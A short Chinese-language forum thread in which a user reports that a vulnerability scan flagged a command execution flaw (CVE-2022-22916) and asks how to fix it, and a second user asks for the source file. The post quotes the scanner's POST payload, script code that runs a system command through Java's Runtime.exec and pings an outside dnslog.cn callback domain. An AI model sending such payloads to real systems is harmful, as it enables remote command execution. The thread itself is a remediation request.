命令执行漏洞修改（CVE-2022-22916）

sunmoon

系统运行漏洞扫描，提出了命令执行漏洞（CVE-2022-22916）

POST数据：

var p =java.lang.Runtime.getRuntime().exec('ping jhglcg.dnslog.cn');

var sc =newjava.util.Scanner(p.getInputStream(),"GBK").useDelimiter("\\A");

varresult = sc.hasNext() ? sc.next() : "";

sc.close();

这个漏洞怎样进行修改？

Ray

这个代码在那里的?请把源文件发出来